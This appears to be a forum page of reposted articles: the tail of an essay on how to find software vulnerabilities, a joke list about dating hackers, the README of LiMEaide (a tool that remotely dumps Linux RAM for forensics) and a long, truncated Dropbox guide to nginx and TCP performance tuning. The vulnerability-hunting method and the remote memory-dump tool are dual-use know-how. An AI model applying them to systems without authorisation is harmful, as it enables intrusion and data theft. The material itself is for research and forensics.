that. Understanding how the software interacts with the OS can give insight on entry points you can use to interact with it (e.g. network listeners, writable files, IOCTL requests). Strings analysis. As with analyzing imports, strings can give some insights into the program's capabilities. I tend to look for things like debug statements, keys/tokens, and anything that looks suspicious in the sense that it doesn't fit with how I would expect the program to function. Interesting strings can be traced for its usages and to see if there are code paths reachable from entry points. It's important to differentiate between strings that are part of the core program and those that are included as part of statically-imported libraries. Security scan triage. 
Automated source code scanning tools may be helpful in finding generic low-hanging fruit, but virtually useless at finding contextual or design-based vulnerabilities. I don't typically find this to be the most productive use of my time because of the sheer number of false positives, but if it yields many confirmed vulnerabilities then it could indicate a bigger picture of poor secure coding practices. Dependency analysis. This involves triaging dependencies (e.g. open-source components) for known vulnerabilities that are exploitable, or finding publicly unknown vulnerabilities that could be leveraged within the context of the target application. A modern large application is often built on many external dependencies. A subset of them can have vulnerabilities, and a subset of those vulnerabilities can "bubble-up" to the main application and become exploitable through an entry point. Common examples include Heartbleed, Shellshock, and various Java deserialization vulnerabilities. Repository analysis. If you have access to a code repository, it may help identify areas that would typically be interesting to researchers. Aside from the benefits of having more context than with a binary alone, it becomes easier to find older areas of code that haven't changed in a long time and areas of code that bridge the development efforts of segmented groups. Code and binary analysis typically takes longer than the other modes and is arguably more difficult because researchers often need to understand the application and its technologies to nearly the same degree as its developers. In practice, this knowledge can often be distributed among segmented groups of developers while researchers need to understand it holistically to be effective. I cannot overstate how important it is to have competency in programming for this. A researcher who can program with the technologies of their target application is almost always better equipped to provide more value. On the offensive side, finding vulnerabilities becomes more intuitive and it becomes easier to adapt exploits to multiple environments. On the defensive side, non-generic remediation recommendations can be provided that target the root cause of the vulnerability at the code level. Similar to the domains of knowledge, actively combining this analysis mode with the others helps makes things click and increases the likelihood of finding vulnerabilities. Other Thoughts and Lessons Learned This section goes over some other thoughts worth mentioning that didn't easily fit in previous sections. Vulnerability Complexity Vulnerabilities vary in a spectrum of complexity. On one end, there are trivial vulnerabilities which have intuitive exploit code used in areas that are highly prone to scrutiny (e.g. the classic SQLi authentication bypass). On the other end are the results of unanticipated interactions between system elements that by themselves are neither insecure nor badly engineered, but lead to a vulnerability when chained together (e.g. Chris Domas' "Memory Sinkhole"). I tend to distinguish between these ends of the spectrum with the respective categories of "first-order vulnerabilities" and "second-order vulnerabilities", but there could be different ways to describe them. The modern exploit is not a single shot vulnerability anymore. They tend to be a chain of vulnerabilities that add up to a full-system compromise. 
— Ben Hawkes, Project Zero Working in Teams It is usually helpful to be upfront to your team about what you know and don't know so that you can (ideally) be delegated tasks in your areas of expertise while being given opportunities to grow in areas of improvement. Pretending and being vague is counterproductive because people who know better will sniff it out easily. If being honest can become political, then maybe it's not an ideal team to work with. On the other hand, you shouldn't expect to be spoon-fed everything you need to know. Learning how to learn on your own can help you become self-reliant and help your team's productivity. If you and your team operate on billable time, the time one takes to teach you might be time they won't get back to focus on their task. The composition of a team in a timed project can be a determining factor to the quantity and quality of vulnerabilities found. Depending on the scale and duration of the project, having more analysts could lead to faster results or lead to extra overhead and be counterproductive. A defining characteristic of some of the best project teams I've been on is that in addition to having good rapport and communication, we had diverse skill sets that played off each other which enhanced our individual capabilities. We also delegated parallelizable tasks that had converging outcomes. Here are some examples: Bob scouts for entry points and their parameters while Alice looks for vulnerable sinks. Alice fleshes out the payload to a vulnerable sink while Bob makes sense of the protocol to the sink's corresponding entry point. Bob reverses structs by analyzing client requests dynamically while Alice contributes by analyzing how they are received statically. Bob looks for accessible file shares on a network while Alice sifts through them for valuable information. Overall, working in teams can increase productivity but it takes some effort and foresight to make that a reality. It's also important to know when adding members won't be productive so as to avoid overhead. Final Notes Thanks for taking the time to read this if you made it this far. I hope this has taken some of the magic out of what's involved when finding vulnerabilities. It's normal to feel overwhelmed and a sense of impostor syndrome when researching (I don't think that ever goes away). This is a constant learning process that extends beyond a day job or what any single resource can teach you. I encourage you to try things on your own and learn how others approach this so you can aggregate, combine, and incorporate elements from each into your own approach. I'd like to thank @spookchop and other unnamed reviewers for their time and contributions. I am always open to more (critical) feedback so please contact me if you have any suggestions. The following tools were used for graphics: GIMP, WordItOut, draw.io, and FreeMind. @Jackson_T Sursa: http://jackson.thuraisamy.me/finding-vulnerabilities.html
  8. 17 tips you should know before dating a Hacker People don't ship with user manuals, same applies to the other type: `The Security Phreaks`. Whether you dated on purpose or by mistake the `security girl `or `security guy` (a.k.a. InfoSec, Information Security, IT Security or simply a Hacker), here are some instructions that might be helpful to tweak and maintain a sustainable, fruitful relationship full of joy, happiness and those shits. If you are into security stuff, the below will help you understand yourself more. Grey is a bad color, it's either they trust you or they don't. Perfect your 1st impression and the last one. Never interrupt them while coding, by this you will violate point #1 in terms of `bad last impression`. Those people are mentally ill Xor bad at their jobs. Don't lie. Those creatures have highly sensitive lie-dars and there to haunt you. In case you managed to keep a lie, they will praise your special powers and will love you forever. They might not answer your call, don't take it personal. Just call back the day after. If you miss your hacker due to some circumstances, get a web cam and play it cyber. Expect waking up after late night text messages. Answer immediately! Your availability is required upon need! Do not expect birthday gifts such as roses, cute hearts and diamond - Expect something useful. For Gods' sake, do not clean up their computer desks. Dust are part of the room's ecosystem. Being invited to technical events and security cons is not a date. Proving them wrong arouses them disregarding your gender. Through inherent nature they like to disassemble stuff and reassemble them. They might disassemble your heart, but RMV (Results might vary) among all extremes. Mostly applied to 1st dates, they might know more secrets about you; don't panic - background checks and social engineering are hackers' bestest hobby. They'll port-scan you for informational purposes. Don't show your vulnerabilities, they'll enjoy discovering them by themselves and will be glad helping you remediate them. A Backdoor might be a solution. Don't ask for their knowledge in Facebook and SMS hacking; if they do, strategically speaking, you'll be the last to inform. You might see them leading Viking wars while `speaking` security. Keep calm, relax, nothing is serious, show that you care. They will notice you understand no shit of their talks, but will appreciate all your interest attempts. Subscribe to 3G/4G : don't join their home networks. Don't trust any network they are connected to. Don't provide them with your home Wi-Fi password, they will not like at first it but will appreciate your security awareness level. On the bright side, they'll accept the challenge. Don't hand them your phone, even for the minimal duration and reasons - you will regret it someday somehow. In the end, your hacker conceives you as computer with a soul, we are all human after all; I hope you make use of my tips and enjoy your holes securely investigated ever after. Thank you for reading this post, please do not hesitate to update me with your feedback, comments and testimonials. Sursa: https://moophz.com/article/17-tips-you-should-know-dating-security-guy-or-girl
  9. LiMEaide v1.3.0 About LiMEaide is a python application designed to remotely dump RAM of a Linux client and create a volatility profile for later analysis on your local host. I hope that this will simplify Linux digital forensics in a remote environment. In order to use LiMEaide all you need to do is feed a remote Linux client IP address, sit back, and consume your favorite caffeinated beverage. How To TL;DR python3 limeaide.py <IP> and magic happens. For more detailed usage checkout the wiki For editing the configuration file see here Detailed usage limeaide.py [OPTIONS] REMOTE_IP -h, --help Shows the help dialog -u, --user : <user> Execute memory grab as sudo user. This is useful when root privileges are not granted. -p, --profile : <distro> <kernel version> <arch> Skip the profiler by providing the distribution, kernel version, and architecture of the remote client. -N, --no-profiler Do NOT run profiler and force the creation of a new module/profile for the client. -C, --dont-compress Do not compress memory file. By default memory is compressed on host. If you experience issues, toggle this flag. In my tests I see a ~60% reduction in file size --delay-pickup Execute a job to create a RAM dump on target system that you will retrieve later. The stored job is located in the scheduled_jobs/ dir that ends in .dat -P, --pickup <path to job file .dat> Pick up a job you previously ran with the --delayed-pickup switch. The file that follows this switch is located in the scheduled_jobs/ directory and ends in .dat -o, --output : <name> Change name of output file. Default is dump.bin -c, --case : <case num> Append case number to front of output directory. --force-clean If previous attempt failed then clean up client Set-up Dependencies python DEB base sudo apt-get install python3-paramiko python3-termcolor RPM base sudo yum install python3-paramiko python3-termcolor pip3 sudo pip3 install paramiko termcolor LiME In order to use LiME you must download and move the source into the LiMEaide/tools directory. Make sure the the LiME folder is named LiME. The full path should be as follows: NOTE: If you would like to build Volatility profiles, you must use my forked version of LiME. This provides debugging symbols used by dwarfdump. LiMEaide/tools/LiME/ How to... Download LiME v1.7.8 Extract into LiMEaide/tools/ Rename folder to LiME dwarfdump In order to build a volatility profile we need to be able to read the debugging symbols in the LKM. For this we need to install dwarfdump. If you encounter any issues finding/installing dwarfdump see the volatility page here DEB package manager sudo apt-get install dwarfdump RPM package manager sudo yum install libdwarf-tools Special Thanks and Notes The idea for this application was built upon the concept dreamed up by and the Linux Memory Grabber project And of course none of this could be possible without the amazing LiME project Limits at this time Support on for bash. Use other shells at your own risk Modules must be built on remote client. Therefore remote client must have proper headers installed. Sursa: https://github.com/kd8bny/LiMEaide
  10. Optimizing web servers for high throughput and low latency Alexey Ivanov Today 63 210 This is an expanded version of my talk at NginxConf 2017 on September 6, 2017. As an SRE on the Dropbox Traffic Team, I’m responsible for our Edge network: its reliability, performance, and efficiency. The Dropbox edge network is an nginx-based proxy tier designed to handle both latency-sensitive metadata transactions and high-throughput data transfers. In a system that is handling tens of gigabits per second while simultaneously processing tens of thousands latency-sensitive transactions, there are efficiency/performance optimizations throughout the proxy stack, from drivers and interrupts, through TCP/IP and kernel, to library, and application level tunings. Disclaimer In this post we’ll be discussing lots of ways to tune web servers and proxies. Please do not cargo-cult them. For the sake of the scientific method, apply them one-by-one, measure their effect, and decide whether they are indeed useful in your environment. This is not a Linux performance post, even though I will make lots of references to bcc tools, eBPF, and perf, this is by no means the comprehensive guide to using performance profiling tools. If you want to learn more about them you may want to read through Brendan Gregg’s blog. This is not a browser-performance post either. I’ll be touching client-side performance when I cover latency-related optimizations, but only briefly. If you want to know more, you should read High Performance Browser Networking by Ilya Grigorik. And, this is also not the TLS best practices compilation. Though I’ll be mentioning TLS libraries and their settings a bunch of times, you and your security team, should evaluate the performance and security implications of each of them. You can use Qualys SSL Test, to verify your endpoint against the current set of best practices, and if you want to know more about TLS in general, consider subscribing to Feisty Duck Bulletproof TLS Newsletter. Structure of the post We are going to discuss efficiency/performance optimizations of different layers of the system. Starting from the lowest levels like hardware and drivers: these tunings can be applied to pretty much any high-load server. Then we’ll move to linux kernel and its TCP/IP stack: these are the knobs you want to try on any of your TCP-heavy boxes. Finally we’ll discuss library and application-level tunings, which are mostly applicable to web servers in general and nginx specifically. For each potential area of optimization I’ll try to give some background on latency/throughput tradeoffs (if any), monitoring guidelines, and, finally, suggest tunings for different workloads. Hardware CPU For good asymmetric RSA/EC performance you are looking for processors with at least AVX2 (avx2 in /proc/cpuinfo) support and preferably for ones with large integer arithmetic capable hardware (bmi and adx). For the symmetric cases you should look for AES-NI for AES ciphers and AVX512 for ChaCha+Poly. Intel has a performance comparison of different hardware generations with OpenSSL 1.0.2, that illustrates effect of these hardware offloads. Latency sensitive use-cases, like routing, will benefit from fewer NUMA nodes and disabled HT. High-throughput tasks do better with more cores, and will benefit from Hyper-Threading (unless they are cache-bound), and generally won’t care about NUMA too much. Specifically, if you go the Intel path, you are looking for at least Haswell/Broadwell and ideally Skylake CPUs. 
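A quick way to verify that a given host actually exposes the extensions mentioned above (a minimal check; the flag names are as they appear in /proc/cpuinfo):
$ grep -o -w -E 'avx2|avx512f|aes|bmi2|adx' /proc/cpuinfo | sort | uniq -c
If aes or avx2 are missing on hardware that should have them, check BIOS/hypervisor settings before blaming the TLS library.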
If you are going with AMD, EPYC has quite impressive performance. NIC Here you are looking for at least 10G, preferably even 25G. If you want to push more than that through a single server over TLS, the tuning described here will not be sufficient, and you may need to push TLS framing down to the kernel level (e.g. FreeBSD, Linux). On the software side, you should look for open source drivers with active mailing lists and user communities. This will be very important if (but most likely, when) you’ll be debugging driver-related problems. Memory The rule of thumb here is that latency-sensitive tasks need faster memory, while throughput-sensitive tasks need more memory. Hard Drive It depends on your buffering/caching requirements, but if you are going to buffer or cache a lot you should go for flash-based storage. Some go as far as using a specialized flash-friendly filesystem (usually log-structured), but they do not always perform better than plain ext4/xfs. Anyway just be careful to not burn through your flash because you forgot to turn enable TRIM, or update the firmware. Operating systems: Low level Firmware You should keep your firmware up-to-date to avoid painful and lengthy troubleshooting sessions. Try to stay recent with CPU Microcode, Motherboard, NICs, and SSDs firmwares. That does not mean you should always run bleeding edge—the rule of thumb here is to run the second to the latest firmware, unless it has critical bugs fixed in the latest version, but not run too far behind. Drivers The update rules here are pretty much the same as for firmware. Try staying close to current. One caveat here is to try to decoupling kernel upgrades from driver updates if possible. For example you can pack your drivers with DKMS, or pre-compile drivers for all the kernel versions you use. That way when you update the kernel and something does not work as expected there is one less thing to troubleshoot. CPU Your best friend here is the kernel repo and tools that come with it. In Ubuntu/Debian you can install the linux-tools package, with handful of utils, but now we only use cpupower, turbostat, and x86_energy_perf_policy. To verify CPU-related optimizations you can stress-test your software with your favorite load-generating tool (for example, Yandex uses Yandex.Tank.) Here is a presentation from the last NginxConf from developers about nginx loadtesting best-practices: “NGINX Performance testing.” cpupower Using this tool is way easier than crawling /proc/. To see info about your processor and its frequency governor you should run: $ cpupower frequency-info ... driver: intel_pstate ... available cpufreq governors: performance powersave ... The governor "performance" may decide which speed to use ... boost state support: Supported: yes Active: yes Check that Turbo Boost is enabled, and for Intel CPUs make sure that you are running with intel_pstate, not the acpi-cpufreq, or even pcc-cpufreq. If you still using acpi-cpufreq, then you should upgrade the kernel, or if that’s not possible, make sure you are using performance governor. When running with intel_pstate, even powersave governor should perform well, but you need to verify it yourself. And speaking about idling, to see what is really happening with your CPU, you can use turbostat to directly look into processor’s MSRs and fetch Power, Frequency, and Idle State information: # turbostat --debug -P ... Avg_MHz Busy% ... CPU%c1 CPU%c3 CPU%c6 ... Pkg%pc2 Pkg%pc3 Pkg%pc6 ... 
Here you can see the actual CPU frequency (yes, /proc/cpuinfo is lying to you), and core/package idle states. If even with the intel_pstate driver the CPU spends more time in idle than you think it should, you can: Set governor to performance. Set x86_energy_perf_policy to performance. Or, only for very latency critical tasks you can: Use [/dev/cpu_dma_latency](https://access.redhat.com/articles/65410) interface. For UDP traffic, use busy-polling. You can learn more about processor power management in general and P-states specifically in the Intel OpenSource Technology Center presentation “Balancing Power and Performance in the Linux Kernel” from LinuxCon Europe 2015. CPU Affinity You can additionally reduce latency by applying CPU affinity on each thread/process, e.g. nginx has worker_cpu_affinity directive, that can automatically bind each web server process to its own core. This should eliminate CPU migrations, reduce cache misses and pagefaults, and slightly increase instructions per cycle. All of this is verifiable through perf stat. Sadly, enabling affinity can also negatively affect performance by increasing the amount of time a process spends waiting for a free CPU. This can be monitored by running runqlat on one of your nginx worker’s PIDs: usecs : count distribution 0 -> 1 : 819 | | 2 -> 3 : 58888 |****************************** | 4 -> 7 : 77984 |****************************************| 8 -> 15 : 10529 |***** | 16 -> 31 : 4853 |** | ... 4096 -> 8191 : 34 | | 8192 -> 16383 : 39 | | 16384 -> 32767 : 17 | | If you see multi-millisecond tail latencies there, then there is probably too much stuff going on on your servers besides nginx itself, and affinity will increase latency, instead of decreasing it. Memory All mm/ tunings are usually very workflow specific, there are only a handful of things to recommend: Set THP to madvise and enable them only when you are sure they are beneficial, otherwise you may get a order of magnitude slowdown while aiming for 20% latency improvement. Unless you are only utilizing only a single NUMA node you should set vm.zone_reclaim_mode to 0. ## NUMA Modern CPUs are actually multiple separate CPU dies connected by very fast interconnect and sharing various resources, starting from L1 cache on the HT cores, through L3 cache within the package, to Memory and PCIe links within sockets. This is basically what NUMA is: multiple execution and storage units with a fast interconnect. For the comprehensive overview of NUMA and its implications you can consult “NUMA Deep Dive Series” by Frank Denneman. But, long story short, you have a choice of: Ignoring it, by disabling it in BIOS or running your software under numactl --interleave=all, you can get mediocre, but somewhat consistent performance. Denying it, by using single node servers, just like Facebook does with OCP Yosemite platform. Embracing it, by optimizing CPU/memory placing in both user- and kernel-space. Let’s talk about the third option, since there is not much optimization needed for the first two. 
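(For completeness, the first option really does require no tuning; it is essentially a one-liner. A sketch, assuming you launch the binary by hand rather than through an init script or systemd unit, and with an illustrative binary path:
$ numactl --interleave=all /usr/sbin/nginx -g 'daemon off;'
The point is simply that memory allocations get spread evenly across nodes, trading peak locality for consistency.)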
To utilize NUMA properly you need to treat each numa node as a separate server, for that you should first inspect the topology, which can be done with numactl --hardware: $ numactl --hardware available: 4 nodes (0-3) node 0 cpus: 0 1 2 3 16 17 18 19 node 0 size: 32149 MB node 1 cpus: 4 5 6 7 20 21 22 23 node 1 size: 32213 MB node 2 cpus: 8 9 10 11 24 25 26 27 node 2 size: 0 MB node 3 cpus: 12 13 14 15 28 29 30 31 node 3 size: 0 MB node distances: node 0 1 2 3 0: 10 16 16 16 1: 16 10 16 16 2: 16 16 10 16 3: 16 16 16 10 Things to look after: number of nodes. memory sizes for each node. number of CPUs for each node. distances between nodes. This is a particularly bad example since it has 4 nodes as well as nodes without memory attached. It is impossible to treat each node here as a separate server without sacrificing half of the cores on the system. We can verify that by using numastat: $ numastat -n -c Node 0 Node 1 Node 2 Node 3 Total -------- -------- ------ ------ -------- Numa_Hit 26833500 11885723 0 0 38719223 Numa_Miss 18672 8561876 0 0 8580548 Numa_Foreign 8561876 18672 0 0 8580548 Interleave_Hit 392066 553771 0 0 945836 Local_Node 8222745 11507968 0 0 19730712 Other_Node 18629427 8939632 0 0 27569060 You can also ask numastat to output per-node memory usage statistics in the /proc/meminfo format: $ numastat -m -c Node 0 Node 1 Node 2 Node 3 Total ------ ------ ------ ------ ----- MemTotal 32150 32214 0 0 64363 MemFree 462 5793 0 0 6255 MemUsed 31688 26421 0 0 58109 Active 16021 8588 0 0 24608 Inactive 13436 16121 0 0 29557 Active(anon) 1193 970 0 0 2163 Inactive(anon) 121 108 0 0 229 Active(file) 14828 7618 0 0 22446 Inactive(file) 13315 16013 0 0 29327 ... FilePages 28498 23957 0 0 52454 Mapped 131 130 0 0 261 AnonPages 962 757 0 0 1718 Shmem 355 323 0 0 678 KernelStack 10 5 0 0 16 Now lets look at the example of a simpler topology. $ numactl --hardware available: 2 nodes (0-1) node 0 cpus: 0 1 2 3 4 5 6 7 16 17 18 19 20 21 22 23 node 0 size: 46967 MB node 1 cpus: 8 9 10 11 12 13 14 15 24 25 26 27 28 29 30 31 node 1 size: 48355 MB Since the nodes are mostly symmetrical we can bind an instance of our application to each NUMA node with numactl --cpunodebind=X --membind=X and then expose it on a different port, that way you can get better throughput by utilizing both nodes and better latency by preserving memory locality. You can verify NUMA placement efficiency by latency of your memory operations, e.g. by using bcc’s funclatency to measure latency of the memory-heavy operation, e.g. memmove. On the kernel side, you can observe efficiency by using perf stat and looking for corresponding memory and scheduler events: # perf stat -e sched:sched_stick_numa,sched:sched_move_numa,sched:sched_swap_numa,migrate:mm_migrate_pages,minor-faults -p PID ... 1 sched:sched_stick_numa 3 sched:sched_move_numa 41 sched:sched_swap_numa 5,239 migrate:mm_migrate_pages 50,161 minor-faults The last bit of NUMA-related optimizations for network-heavy workloads comes from the fact that a network card is a PCIe device and each device is bound to its own NUMA-node, therefore some CPUs will have lower latency when talking to the network. We’ll discuss optimizations that can be applied there when we discuss NIC→CPU affinity, but for now lets switch gears to PCI-Express… PCIe Normally you do not need to go too deep into PCIe troubleshooting unless you have some kind of hardware malfunction. 
Therefore it’s usually worth spending minimal effort there by just creating “link width”, “link speed”, and possibly RxErr/BadTLP alerts for your PCIe devices. This should save you troubleshooting hours because of broken hardware or failed PCIe negotiation. You can use lspci for that: # lspci -s 0a:00.0 -vvv ... LnkCap: Port #0, Speed 8GT/s, Width x8, ASPM L1, Exit Latency L0s <2us, L1 <16us LnkSta: Speed 8GT/s, Width x8, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- ... Capabilities: [100 v2] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- ... UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- ... UESvrt: DLP+ SDES+ TLP- FCP+ CmpltTO- CmpltAbrt- ... CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr- CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ PCIe may become a bottleneck though if you have multiple high-speed devices competing for the bandwidth (e.g. when you combine fast network with fast storage), therefore you may need to physically shard your PCIe devices across CPUs to get maximum throughput. source: https://en.wikipedia.org/wiki/PCI_Express#History_and_revisions Also see the article, “Understanding PCIe Configuration for Maximum Performance,” on the Mellanox website, that goes a bit deeper into PCIe configuration, which may be helpful at higher speeds if you observe packet loss between the card and the OS. Intel suggests that sometimes PCIe power management (ASPM) may lead to higher latencies and therefore higher packet loss. You can disable it by adding pcie_aspm=off to the kernel cmdline. NIC Before we start, it worth mentioning that both Intel and Mellanox have their own performance tuning guides and regardless of the vendor you pick it’s beneficial to read both of them. Also drivers usually come with a README on their own and a set of useful utilities. Next place to check for the guidelines is your operating system’s manuals, e.g. Red Hat Enterprise Linux Network Performance Tuning Guide, which explains most of the optimizations mentioned below and even more. Cloudflare also has a good article about tuning that part of the network stack on their blog, though it is mostly aimed at low latency use-cases. When optimizing NICs ethtool will be your best friend. A small note here: if you are using a newer kernel (and you really should!) you should also bump some parts of your userland, e.g. for network operations you probably want newer versions of: ethtool, iproute2, and maybe iptables/nftables packages. Valuable insight into what is happening with you network card can be obtained via ethtool -S: $ ethtool -S eth0 | egrep 'miss|over|drop|lost|fifo' rx_dropped: 0 tx_dropped: 0 port.rx_dropped: 0 port.tx_dropped_link_down: 0 port.rx_oversize: 0 port.arq_overflows: 0 Consult with your NIC manufacturer for detailed stats description, e.g. Mellanox have a dedicated wiki page for them. From the kernel side of things you’ll be looking at /proc/interrupts, /proc/softirqs, and /proc/net/softnet_stat. There are two useful bcc tools here: hardirqs and softirqs. Your goal in optimizing the network is to tune the system until you have minimal CPU usage while having no packet loss. Interrupt Affinity Tunings here usually start with spreading interrupts across the processors. How specifically you should do that depends on your workload: For maximum throughput you can distribute interrupts across all NUMA-nodes in the system. To minimize latency you can limit interrupts to a single NUMA-node. 
To do that you may need to reduce the number of queues to fit into a single node (this usually implies cutting their number in half with ethtool -L). Vendors usually provide scripts to do that, e.g. Intel has set_irq_affinity. Ring buffer sizes Network cards need to exchange information with the kernel. This is usually done through a data structure called a “ring”, current/maximum size of that ring viewed via ethtool -g: $ ethtool -g eth0 Ring parameters for eth0: Pre-set maximums: RX: 4096 TX: 4096 Current hardware settings: RX: 4096 TX: 4096 You can adjust these values within pre-set maximums with -G. Generally bigger is better here (esp. if you are using interrupt coalescing), since it will give you more protection against bursts and in-kernel hiccups, therefore reducing amount of dropped packets due to no buffer space/missed interrupt. But there are couple of caveats: On older kernels, or drivers without BQL support, high values may attribute to a higher bufferbloat on the tx-side. Bigger buffers will also increase cache pressure, so if you are experiencing one, try lowing them. Coalescing Interrupt coalescing allows you to delay notifying the kernel about new events by aggregating multiple events in a single interrupt. Current setting can be viewed via ethtool -c: $ ethtool -c eth0 Coalesce parameters for eth0: ... rx-usecs: 50 tx-usecs: 50 You can either go with static limits, hard-limiting maximum number of interrupts per second per core, or depend on the hardware to automatically adjust the interrupt rate based on the throughput. Enabling coalescing (with -C) will increase latency and possibly introduce packet loss, so you may want to avoid it for latency sensitive. On the other hand, disabling it completely may lead to interrupt throttling and therefore limit your performance. Offloads Modern network cards are relatively smart and can offload a great deal of work to either hardware or emulate that offload in drivers themselves. All possible offloads can be obtained with ethtool -k: $ ethtool -k eth0 Features for eth0: ... tcp-segmentation-offload: on generic-segmentation-offload: on generic-receive-offload: on large-receive-offload: off [fixed] In the output all non-tunable offloads are marked with [fixed] suffix. There is a lot to say about all of them, but here are some rules of thumb: do not enable LRO, use GRO instead. be cautious about TSO, since it highly depends on the quality of your drivers/firmware. do not enable TSO/GSO on old kernels, since it may lead to excessive bufferbloat. **** Packet Steering All modern NICs are optimized for multi-core hardware, therefore they internally split packets into virtual queues, usually one-per CPU. When it is done in hardware it is called RSS, when the OS is responsible for loadbalancing packets across CPUs it is called RPS (with its TX-counterpart called XPS). When the OS also tries to be smart and route flows to the CPUs that are currently handling that socket, it is called RFS. When hardware does that it is called “Accelerated RFS” or aRFS for short. Here are couple of best practices from our production: If you are using newer 25G+ hardware it probably has enough queues and a huge indirection table to be able to just RSS across all your cores. Some older NICs have limitations of only utilizing the first 16 CPUs. You can try enabling RPS if: you have more CPUs than hardware queues and you want to sacrifice latency for throughput. you are using internal tunneling (e.g. 
GRE/IPinIP) that NIC can’t RSS; Do not enable RPS if your CPU is quite old and does not have x2APIC. Binding each CPU to its own TX queue through XPS is generally a good idea. Effectiveness of RFS is highly depended on your workload and whether you apply CPU affinity to it. **** Flow Director and ATR Enabled flow director (or fdir in Intel terminology) operates by default in an Application Targeting Routing mode which implements aRFS by sampling packets and steering flows to the core where they presumably are being handled. Its stats are also accessible through ethtool -S:$ ethtool -S eth0 | egrep ‘fdir’ port.fdir_flush_cnt: 0 … Though Intel claims that fdir increases performance in some cases, external research suggests that it can also introduce up to 1% of packet reordering, which can be quite damaging for TCP performance. Therefore try testing it for yourself and see if FD is useful for your workload, while keeping an eye for the TCPOFOQueue counter. Operating systems: Networking stack There are countless books, videos, and tutorials for the tuning the Linux networking stack. And sadly tons of “sysctl.conf cargo-culting” that comes with them. Even though recent kernel versions do not require as much tuning as they used to 10 years ago and most of the new TCP/IP features are enabled and well-tuned by default, people are still copy-pasting their old sysctls.conf that they’ve used to tune 2.6.18/2.6.32 kernels. To verify effectiveness of network-related optimizations you should: Collect system-wide TCP metrics via /proc/net/snmp and /proc/net/netstat. Aggregate per-connection metrics obtained either from ss -n --extended --info, or from calling getsockopt(``[TCP_INFO](http://linuxgazette.net/136/pfeiffer.html)``)/getsockopt(``[TCP_CC_INFO](https://patchwork.ozlabs.org/patch/465806/)``) inside your werbserver. tcptrace(1)’es of sampled TCP flows. Analyze RUM metrics from the app/browser. For sources of information about network optimizations, I usually enjoy conference talks by CDN-folks since they generally know what they are doing, e.g. Fastly on LinuxCon Australia. Listening what Linux kernel devs say about networking is quite enlightening too, for example netdevconf talks and NETCONF transcripts. It worth highlighting good deep-dives into Linux networking stack by PackageCloud, especially since they put an accent on monitoring instead of blindly tuning things: Monitoring and Tuning the Linux Networking Stack: Receiving Data Monitoring and Tuning the Linux Networking Stack: Sending Data Before we start, let me state it one more time: upgrade your kernel! There are tons of new network stack improvements, and I’m not even talking about IW10 (which is so 2010). I am talking about new hotness like: TSO autosizing, FQ, pacing, TLP, and RACK, but more on that later. As a bonus by upgrading to a new kernel you’ll get a bunch of scalability improvements, e.g.: removed routing cache, lockless listen sockets, SO_REUSEPORT, and many more. Overview From the recent Linux networking papers the one that stands out is “Making Linux TCP Fast.” It manages to consolidate multiple years of Linux kernel improvements on 4 pages by breaking down Linux sender-side TCP stack into functional pieces: Fair Queueing and Pacing Fair Queueing is responsible for improving fairness and reducing head of line blocking between TCP flows, which positively affects packet drop rates. 
Pacing schedules packets at a rate set by congestion control, equally spaced over time, which reduces packet loss even further, therefore increasing throughput. As a side note: Fair Queueing and Pacing are available in Linux via the fq qdisc. Some of you may know that these are a requirement for BBR (not anymore though), but both of them can be used with CUBIC, yielding up to a 15-20% reduction in packet loss and therefore better throughput on loss-based CCs. Just don't use it in older kernels (< 3.19), since you will end up pacing pure ACKs and cripple your uploads/RPCs. TSO autosizing and TSQ Both of these are responsible for limiting buffering inside the TCP stack and hence reducing latency, without sacrificing throughput. Congestion Control CC algorithms are a huge subject by themselves, and there was a lot of activity around them in recent years. Some of that activity was codified as: tcp_cdg (CAIA), tcp_nv (Facebook), and tcp_bbr (Google). We won't go too deep into discussing their inner workings; let's just say that all of them rely more on delay increases than packet drops for a congestion indication. BBR is arguably the most well-documented, tested, and practical out of all the new congestion controls. The basic idea is to create a model of the network path based on packet delivery rate and then execute control loops to maximize bandwidth while minimizing RTT. This is exactly what we are looking for in our proxy stack. Preliminary data from BBR experiments on our Edge PoPs shows an increase in file download speeds (6-hour TCP BBR experiment in Tokyo PoP: x-axis — time, y-axis — client download speed). Here I want to stress that we observe a speed increase across all percentiles. That is not the case for backend changes. These usually only benefit p90+ users (the ones with the fastest internet connectivity), since we consider everyone else to be bandwidth-limited already. Network-level tunings like changing congestion control or enabling FQ/pacing show that users are not being bandwidth-limited but, if I can say this, they are "TCP-limited." If you want to know more about BBR, APNIC has a good entry-level overview of BBR (and its comparison to loss-based congestion controls). For more in-depth information on BBR you probably want to read through the bbr-dev mailing list archives (it has a ton of useful links pinned at the top). For people interested in congestion control in general, it may be fun to follow the Internet Congestion Control Research Group activity. ACK Processing and Loss Detection But enough about congestion control, let's talk about loss detection; here, once again, running the latest kernel will help quite a bit. New heuristics like TLP and RACK are constantly being added to TCP, while the old stuff like FACK and ER is being retired. Once added, they are enabled by default, so you do not need to tune any system settings after the upgrade. Userspace prioritization and HOL Userspace socket APIs provide implicit buffering and no way to re-order chunks once they are sent, therefore in multiplexed scenarios (e.g. HTTP/2) this may result in HOL blocking and inversion of h2 priorities. The [TCP_NOTSENT_LOWAT](https://lwn.net/Articles/560082/) socket option (and the corresponding net.ipv4.tcp_notsent_lowat sysctl) was designed to solve this problem by setting a threshold at which the socket considers itself writable (i.e. epoll will lie to your app).
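A minimal way to experiment with it is the system-wide sysctl mentioned above. The value below is purely illustrative; the right threshold depends on your RTTs and write sizes, so measure before and after:
$ sysctl -w net.ipv4.tcp_notsent_lowat=16384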
Setting this option can solve problems with HTTP/2 prioritization, but it can also potentially negatively affect throughput, so you know the drill—test it yourself.
Sysctls
One does not simply give a networking optimization talk without mentioning sysctls that need to be tuned. But let me first start with the stuff you don’t want to touch:
net.ipv4.tcp_tw_recycle=1—don’t use it—it was already broken for users behind NAT, but if you upgrade your kernel, it will be broken for everyone.
net.ipv4.tcp_timestamps=0—don’t disable them unless you know all the side effects and you are OK with them. For example, one of the non-obvious side effects is that you will lose window scaling and SACK options on syncookies.
As for sysctls that you should be using:
net.ipv4.tcp_slow_start_after_idle=0—the main problem with slowstart after idle is that “idle” is defined as one RTO, which is too small.
